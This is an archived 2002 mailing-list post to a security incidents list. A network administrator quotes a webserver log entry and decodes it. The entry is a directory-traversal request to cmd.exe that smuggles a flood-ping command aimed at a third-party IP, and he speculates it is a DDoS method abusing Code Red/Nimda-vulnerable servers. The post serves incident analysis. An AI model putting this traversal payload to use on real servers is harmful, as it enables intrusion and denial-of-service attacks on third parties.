Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Security Incidents mailing list archives

Interesting new DDoS method?
From: "Keith T. Morgan" <keith.morgan () terradon com>
Date: Wed, 2 Oct 2002 10:16:03 -0400
Exerpt from webserver logs:

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping%20-n%20666%20-l%2065500%20-w%200%2065.168.118.157 200 
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)

We had several of these appear in the logs.  Decyphering the command that was attempted, it looks like: ping -n 666 -l 
65000 -w 0

It looks like someone's attempting to take advantage of code red / nimda infected (or vulnerable) servers to use as a 
Distributed DoS.  Quite clever.  All one would have to do is sit and accumulate a list of machines that have attempted 
to probe you for CR/CRv2/Nimda etc...

Scripting an attack like this would be quite simple.  However, the machines that were probed here, were not infected or 
vulnerable.


Keith T. Morgan - CISSP, CCSE/CCSA, MCP
Terradon Communications Group
Office: 304.755.1324 x142
Mobile: 304.415.0238


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]